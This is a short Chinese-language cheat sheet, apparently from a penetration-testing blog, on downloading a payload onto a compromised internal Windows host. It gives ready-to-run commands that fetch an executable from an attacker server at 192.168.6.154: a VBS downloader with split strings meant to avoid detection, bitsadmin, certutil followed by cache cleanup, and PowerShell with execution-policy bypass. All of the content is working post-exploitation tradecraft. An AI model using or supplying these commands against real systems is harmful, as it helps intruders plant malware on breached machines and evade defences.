当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload
1、vbs
#首先先向windows写入一个vbs脚本
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
#利用windows自带的cscript执行vbs和脚本下载指定文件到windows指定位置
cscript downfile.vbs http://192.168.6.154/zwish.exe C:/Users/zw/Desktop/target.exe
2、bitsadmin
这是windows自带的工具,Windows xp以后的版本中自带该工具,例如Windows Update程序就依靠它来下载文件,但比较慢
bitsadmin /transfer 111 http://192.168.6.154/index.html C:UserszwDesktopindex.html
#111为任务号
3、certutil
这也是windows自带的一款工具,可用于在Windows中管理证书,CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。
certutil -urlcache -split -f http://192.168.6.154/zwish.exe
#这种下载方法默认会留下缓存,下载完成后通过delete参数清除缓存
certutil -urlcache -split -f http://192.168.6.154/zwish.exe delete
4、powershell
这个耳熟能详了,Powershell在windows server 2003以后版本的操作系统中默认是自带的
powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.6.154/zwish.exe','C:/Users/zw/Desktop/zwish1.exe');
后续补充......